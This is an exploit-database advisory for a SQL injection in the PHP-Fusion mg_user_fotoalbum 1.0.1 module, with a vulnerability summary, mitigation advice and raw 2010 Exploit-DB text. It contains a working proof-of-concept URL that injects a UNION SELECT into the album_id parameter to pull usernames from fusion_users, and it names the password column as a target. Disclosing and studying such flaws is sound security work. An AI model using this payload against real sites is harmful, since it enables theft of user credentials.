PHP-Fusion mg user fotoalbum 1.0.1

vendor:

mg_user_fotoalbum

by:

Easy Laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: mg_user_fotoalbum

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:php-fusion:mg_user_fotoalbum:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2010

PHP-Fusion mg user fotoalbum 1.0.1 <= SQL injection Vulnerability Proof of Concept

A SQL injection vulnerability exists in PHP-Fusion mg user fotoalbum 1.0.1. An attacker can exploit this vulnerability to gain access to sensitive information from the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'album_user_id' and 'album_id' parameters of the 'mg_user_fotoalbum.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information from the database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL statements in an application. It is also recommended to use stored procedures to access the database instead of dynamic SQL statements.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : PHP-Fusion mg user fotoalbum 1.0.1 <=  SQL injection Vulnerability Proof of Concept
+Autor : Easy Laster
+Date   : 10.10.2010
+Script  : PHP-Fusion mg user fotoalbum 1.0.1
+Download : http://phpfusion.marcusg.de/downloads.php?page_id=67
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
 
---------------------------------------------------------------------------------------
                                                                                      
 ___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_| 
                                              |___|                 |___|           
 
 
----------------------------------------------------------------------------------------
+Proof of Concept
+Table : fusion_users
+columns : user_password, user_name
+Proof of Concept : http://www.site.com/infusions/mg_user_fotoalbum_panel/mg_user_fot
oalbum.php?album_user_id=251&album_id=%27+union+select+1,2,3,4,user_name,6,7,8,9,10,11
+from+fusion_users+where+user_id=1--+
----------------------------------------------------------------------------------------